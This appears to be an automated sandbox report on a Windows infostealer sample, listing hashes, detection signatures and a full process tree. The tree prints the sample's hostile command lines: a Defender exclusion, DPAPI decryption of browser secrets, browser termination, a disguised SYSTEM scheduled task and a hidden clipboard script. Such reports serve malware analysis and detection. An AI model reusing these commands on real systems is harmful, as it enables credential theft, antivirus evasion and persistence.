Analysis
max time kernel: 11s
max time network: 33s
platform: windows10-2004_x64
resource: win10v2004-20240226-en
resource tags: arch:x64, arch:x86, image:win10v2004-20240226-en, locale:en-us, os:windows10-2004-x64, system
submitted: 03/06/2024, 10:30
Static task: static1
Behavioral task: behavioral1, sample xylex (1).exe, resource win7-20240419-en
Behavioral task: behavioral2, sample xylex (1).exe, resource win10v2004-20240226-en
General
Target: xylex (1).exe
Size: 37.6MB
MD5: 8eacf3f9be7e3735352c4020fc4e05e9
SHA1: 0bb6c048d9e683e152de21f7d368a4c151095504
SHA256: 4c5b20b4ca8009ab72a76ed7fa6e09bd1b0b78969980f2b49d9a6641439c8d7e
SHA512: 2f5c54c4561f14fbf9a58075dffe268247f3af3408084c12a8a7ed0fbb33f01448e85a06ba684b037e0489fbcbb7481a825cf23785c7b7c1d60c28467825e3f0
SSDEEP: 786432:R3on1HvSzxAMNjFZArYs4nPv0so7OZJJe:RYn1HvSpNjXm4P5u2e
Malware Config
Signatures
- Command and Scripting Interpreter: PowerShell (1 TTPs, 3 IoCs)
  Run PowerShell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
  pid / Process: 2776 powershell.exe; 1648 powershell.exe; 2196 powershell.exe
- Checks computer location settings (2 TTPs, 1 IoCs)
  Looks up country code configured in the registry, likely geofence.
  description / ioc / Process: Key value queried | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation | xylex (1).exe
- Loads dropped DLL (1 IoCs)
  pid / Process: 3204 xylex (1).exe
- Looks up external IP address via web service (1 IoCs)
  Uses a legitimate IP lookup service to find the infected system's external IP.
  flow / ioc: 31 api.ipify.org
- An obfuscated cmd.exe command-line is typically used to evade detection. (2 IoCs)
  pid / Process: 2016 cmd.exe; 4112 cmd.exe
- Creates scheduled task(s) (1 TTPs, 1 IoCs)
  Schtasks is often used by malware for persistence or to perform post-infection execution.
  pid / Process: 2384 schtasks.exe
- Enumerates processes with tasklist (1 TTPs, 2 IoCs)
  pid / Process: 2560 tasklist.exe; 1612 tasklist.exe
- Enumerates system info in registry (2 TTPs, 3 IoCs)
  description / ioc / Process:
    Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | chrome.exe
    Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | chrome.exe
    Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | chrome.exe
- Kills process with taskkill (2 IoCs)
  pid / Process: 2952 taskkill.exe; 4340 taskkill.exe
- Suspicious behavior: EnumeratesProcesses (4 IoCs)
  pid / Process: 1648 powershell.exe (x2); 3292 chrome.exe (x2)
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary (2 IoCs)
  pid / Process: 3292 chrome.exe (x2)
- Suspicious use of AdjustPrivilegeToken (5 IoCs)
  description / pid / Process: Token: SeDebugPrivilege | 1648 powershell.exe; Token: SeShutdownPrivilege | 3292 chrome.exe (x2); Token: SeCreatePagefilePrivilege | 3292 chrome.exe (x2)
- Suspicious use of FindShellTrayWindow (25 IoCs)
  pid / Process: 3292 chrome.exe (x25)
- Suspicious use of SendNotifyMessage (24 IoCs)
  pid / Process: 3292 chrome.exe (x24)
- Suspicious use of WriteProcessMemory (64 IoCs)
  description / pid / Process / procid_target (identical entries collapsed, repeat count in parentheses):
    PID 3292 wrote to memory of 3976 | 3292 chrome.exe | 93 (x2)
    PID 3204 wrote to memory of 736 | 3204 xylex (1).exe | 94 (x2)
    PID 736 wrote to memory of 776 | 736 cmd.exe | 95 (x2)
    PID 736 wrote to memory of 1648 | 736 cmd.exe | 96 (x2)
    PID 3292 wrote to memory of 4616 | 3292 chrome.exe | 98 (x38)
    PID 3292 wrote to memory of 4636 | 3292 chrome.exe | 99 (x2)
    PID 3292 wrote to memory of 2040 | 3292 chrome.exe | 100 (x16)
Processes (process tree; indentation shows parent/child depth, signatures hit by each process listed beneath it)

C:\Users\Admin\AppData\Local\Temp\xylex (1).exe  (PID 3204)
  cmdline: "C:\Users\Admin\AppData\Local\Temp\xylex (1).exe"
  - Checks computer location settings
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  C:\Windows\system32\cmd.exe  (PID 736)
    cmdline: C:\Windows\system32\cmd.exe /d /s /c "type .\temp.ps1 | powershell.exe -noprofile -"
    - Suspicious use of WriteProcessMemory
    C:\Windows\system32\cmd.exe  (PID 776)
      cmdline: C:\Windows\system32\cmd.exe /S /D /c" type .\temp.ps1 "
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  (PID 1648)
      cmdline: powershell.exe -noprofile -
      - Command and Scripting Interpreter: PowerShell
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe  (PID 4056)
        cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\t2s52bq2\t2s52bq2.cmdline"
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe  (PID 1944)
          cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES2507.tmp" "c:\Users\Admin\AppData\Local\Temp\t2s52bq2\CSCF622ED14E04E49A99BFB8C123274096.TMP"
  C:\Windows\system32\cmd.exe  (PID 1856)
    cmdline: C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
    C:\Windows\system32\curl.exe  (PID 384)
      cmdline: curl http://api.ipify.org/ --ssl-no-revoke
  C:\Windows\system32\cmd.exe  (PID 4128)
    cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    C:\Windows\system32\tasklist.exe  (PID 2560)
      cmdline: tasklist
      - Enumerates processes with tasklist
  C:\Windows\system32\cmd.exe  (PID 1616)
    cmdline: C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM chrome.exe /F"
    C:\Windows\system32\taskkill.exe  (PID 2952)
      cmdline: taskkill /IM chrome.exe /F
      - Kills process with taskkill
  C:\Windows\system32\cmd.exe  (PID 1680)
    cmdline: C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM msedge.exe /F"
    C:\Windows\system32\taskkill.exe  (PID 4340)
      cmdline: taskkill /IM msedge.exe /F
      - Kills process with taskkill
  C:\Windows\system32\cmd.exe  (PID 1628)
    cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    C:\Windows\system32\tasklist.exe  (PID 1612)
      cmdline: tasklist
      - Enumerates processes with tasklist
  C:\Windows\system32\cmd.exe  (PID 2016)
    cmdline: C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,62,21,214,225,79,56,69,78,166,59,95,27,253,149,23,2,0,0,0,0,2,0,0,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,226,241,92,66,174,187,6,38,209,193,142,166,116,244,248,31,73,3,124,122,132,249,215,184,221,61,142,63,81,31,235,133,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,131,228,65,214,200,163,167,4,113,222,37,206,252,183,179,243,139,246,96,173,127,6,13,187,15,183,207,98,67,208,33,241,48,0,0,0,149,231,106,81,112,102,41,127,125,162,67,100,183,39,147,134,104,182,155,155,80,150,49,84,30,123,115,253,164,30,208,57,168,236,10,216,222,207,149,153,9,220,3,233,51,202,182,161,64,0,0,0,165,23,67,63,92,175,41,154,37,17,89,91,54,206,178,76,58,178,32,96,55,61,68,213,172,26,220,113,216,72,144,138,217,131,17,196,132,54,25,154,207,53,11,7,244,44,83,247,206,53,182,251,206,70,40,32,195,82,216,215,113,156,204,19), $null, 'CurrentUser')"
    - An obfuscated cmd.exe command-line is typically used to evade detection.
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  (PID 636)
      cmdline: powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,62,21,214,225,79,56,69,78,166,59,95,27,253,149,23,2,0,0,0,0,2,0,0,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,226,241,92,66,174,187,6,38,209,193,142,166,116,244,248,31,73,3,124,122,132,249,215,184,221,61,142,63,81,31,235,133,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,131,228,65,214,200,163,167,4,113,222,37,206,252,183,179,243,139,246,96,173,127,6,13,187,15,183,207,98,67,208,33,241,48,0,0,0,149,231,106,81,112,102,41,127,125,162,67,100,183,39,147,134,104,182,155,155,80,150,49,84,30,123,115,253,164,30,208,57,168,236,10,216,222,207,149,153,9,220,3,233,51,202,182,161,64,0,0,0,165,23,67,63,92,175,41,154,37,17,89,91,54,206,178,76,58,178,32,96,55,61,68,213,172,26,220,113,216,72,144,138,217,131,17,196,132,54,25,154,207,53,11,7,244,44,83,247,206,53,182,251,206,70,40,32,195,82,216,215,113,156,204,19), $null, 'CurrentUser')
  C:\Windows\system32\cmd.exe  (PID 4112)
    cmdline: C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,62,21,214,225,79,56,69,78,166,59,95,27,253,149,23,2,16,0,0,0,30,0,0,0,77,0,105,0,99,0,114,0,111,0,115,0,111,0,102,0,116,0,32,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,22,112,227,168,114,112,222,117,255,186,21,20,62,164,21,78,138,29,117,102,37,158,95,191,222,243,229,76,131,150,208,21,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,15,191,197,112,100,253,69,173,90,197,123,238,97,57,113,31,109,57,255,16,29,34,251,119,173,164,99,127,217,184,87,14,48,0,0,0,39,143,71,133,119,177,86,214,255,150,66,238,235,39,227,130,174,75,102,251,8,157,125,240,197,47,18,187,60,79,177,108,126,44,70,150,27,103,18,233,85,68,122,183,133,20,142,87,64,0,0,0,52,188,69,195,61,155,62,101,135,6,116,75,221,127,86,194,99,76,109,194,23,60,103,21,143,243,237,75,65,85,82,208,42,186,160,241,67,91,115,111,41,33,226,65,232,204,148,76,188,101,120,191,85,141,50,12,212,183,1,181,129,41,122,232), $null, 'CurrentUser')"
    - An obfuscated cmd.exe command-line is typically used to evade detection.
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  (PID 4280)
      cmdline: powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,62,21,214,225,79,56,69,78,166,59,95,27,253,149,23,2,16,0,0,0,30,0,0,0,77,0,105,0,99,0,114,0,111,0,115,0,111,0,102,0,116,0,32,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,22,112,227,168,114,112,222,117,255,186,21,20,62,164,21,78,138,29,117,102,37,158,95,191,222,243,229,76,131,150,208,21,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,15,191,197,112,100,253,69,173,90,197,123,238,97,57,113,31,109,57,255,16,29,34,251,119,173,164,99,127,217,184,87,14,48,0,0,0,39,143,71,133,119,177,86,214,255,150,66,238,235,39,227,130,174,75,102,251,8,157,125,240,197,47,18,187,60,79,177,108,126,44,70,150,27,103,18,233,85,68,122,183,133,20,142,87,64,0,0,0,52,188,69,195,61,155,62,101,135,6,116,75,221,127,86,194,99,76,109,194,23,60,103,21,143,243,237,75,65,85,82,208,42,186,160,241,67,91,115,111,41,33,226,65,232,204,148,76,188,101,120,191,85,141,50,12,212,183,1,181,129,41,122,232), $null, 'CurrentUser')
  C:\Windows\system32\cmd.exe  (PID 3412)
    cmdline: C:\Windows\system32\cmd.exe /d /s /c "wmic diskdrive get serialnumber"
    C:\Windows\System32\Wbem\WMIC.exe  (PID 740)
      cmdline: wmic diskdrive get serialnumber
  C:\Windows\system32\cmd.exe  (PID 2884)
    cmdline: C:\Windows\system32\cmd.exe /d /s /c "reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Steam /f"
    C:\Windows\system32\reg.exe  (PID 1984)
      cmdline: reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Steam /f
  C:\Windows\system32\cmd.exe  (PID 2548)
    cmdline: C:\Windows\system32\cmd.exe /d /s /c "schtasks /create /tn "GoogleUpdateTaskMachineUAC" /tr "cscript //nologo C:\ProgramData\edge\Updater\RunBatHidden.vbs" /sc minute /mo 10 /f /RU SYSTEM"
    C:\Windows\system32\schtasks.exe  (PID 2384)
      cmdline: schtasks /create /tn "GoogleUpdateTaskMachineUAC" /tr "cscript //nologo C:\ProgramData\edge\Updater\RunBatHidden.vbs" /sc minute /mo 10 /f /RU SYSTEM
      - Creates scheduled task(s)
  C:\Windows\system32\cmd.exe  (PID 4916)
    cmdline: C:\Windows\system32\cmd.exe /d /s /c "powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\ProgramData\edge\Updater\Get-Clipboard.ps1""
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  (PID 2196)
      cmdline: powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\ProgramData\edge\Updater\Get-Clipboard.ps1"
      - Command and Scripting Interpreter: PowerShell
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe  (PID 4060)
        cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\fvqvcua3\fvqvcua3.cmdline"
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe  (PID 1284)
          cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES3F75.tmp" "c:\Users\Admin\AppData\Local\Temp\fvqvcua3\CSCA4DC5115CC9C4B2DBC6C33A57973739F.TMP"
  C:\Windows\system32\cmd.exe  (PID 2644)
    cmdline: C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
    C:\Windows\System32\Wbem\WMIC.exe  (PID 2288)
      cmdline: wmic bios get smbiosbiosversion
  C:\Windows\system32\cmd.exe  (PID 3588)
    cmdline: C:\Windows\system32\cmd.exe /d /s /c "cscript //nologo "C:\ProgramData\edge\Updater\RunBatHidden.vbs""
    C:\Windows\system32\cscript.exe  (PID 2040)
      cmdline: cscript //nologo "C:\ProgramData\edge\Updater\RunBatHidden.vbs"
      C:\Windows\system32\cmd.exe  (PID 1800)
        cmdline: C:\Windows\system32\cmd.exe /c ""C:\ProgramData\edge\Updater\CheckEpicGamesLauncher.bat" "
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  (PID 2776)
          cmdline: powershell Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"
          - Command and Scripting Interpreter: PowerShell
  C:\Windows\system32\cmd.exe  (PID 2344)
    cmdline: C:\Windows\system32\cmd.exe /d /s /c "wmic baseboard get serialnumber"
    C:\Windows\System32\Wbem\WMIC.exe  (PID 5068)
      cmdline: wmic baseboard get serialnumber
  C:\Windows\system32\cmd.exe  (PID 2372)
    cmdline: C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
    C:\Windows\System32\Wbem\WMIC.exe  (PID 3012)
      cmdline: wmic MemoryChip get /format:list
    C:\Windows\system32\find.exe  (PID 636)
      cmdline: find /i "Speed"
  C:\Windows\system32\cmd.exe  (PID 2396)
    cmdline: C:\Windows\system32\cmd.exe /d /s /c "powershell wininit.exe"
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  (PID 2184)
      cmdline: powershell wininit.exe
      C:\Windows\system32\wininit.exe  (PID 1412)
        cmdline: "C:\Windows\system32\wininit.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe  (PID 3292)
  cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe"
  - Enumerates system info in registry
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  - Suspicious use of WriteProcessMemory
  C:\Program Files\Google\Chrome\Application\chrome.exe  (PID 3976)
    cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ff9eb3b9758,0x7ff9eb3b9768,0x7ff9eb3b9778
  C:\Program Files\Google\Chrome\Application\chrome.exe  (PID 4616)
    cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1780 --field-trial-handle=1944,i,18054348766114723912,9745117814777440454,131072 /prefetch:2
  C:\Program Files\Google\Chrome\Application\chrome.exe  (PID 4636)
    cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2092 --field-trial-handle=1944,i,18054348766114723912,9745117814777440454,131072 /prefetch:8
  C:\Program Files\Google\Chrome\Application\chrome.exe  (PID 2040)
    cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2228 --field-trial-handle=1944,i,18054348766114723912,9745117814777440454,131072 /prefetch:8
  C:\Program Files\Google\Chrome\Application\chrome.exe  (PID 3668)
    cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3060 --field-trial-handle=1944,i,18054348766114723912,9745117814777440454,131072 /prefetch:1
  C:\Program Files\Google\Chrome\Application\chrome.exe  (PID 4004)
    cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3232 --field-trial-handle=1944,i,18054348766114723912,9745117814777440454,131072 /prefetch:1
  C:\Program Files\Google\Chrome\Application\chrome.exe  (PID 4684)
    cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4548 --field-trial-handle=1944,i,18054348766114723912,9745117814777440454,131072 /prefetch:1
  C:\Program Files\Google\Chrome\Application\chrome.exe  (PID 3468)
    cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3712 --field-trial-handle=1944,i,18054348766114723912,9745117814777440454,131072 /prefetch:8
  C:\Program Files\Google\Chrome\Application\chrome.exe  (PID 1616)
    cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4748 --field-trial-handle=1944,i,18054348766114723912,9745117814777440454,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe  (PID 4992)
  cmdline: "C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
Network
MITRE ATT&CK Enterprise v15
Downloads
C:\Users\Admin\AppData\Local\Temp\pkg\f806f89dc41dde00ca7124dc1e649bdc9b08ff2eff5c891b764f3e5aefa9548c\sqlite3\build\Release\node_sqlite3.node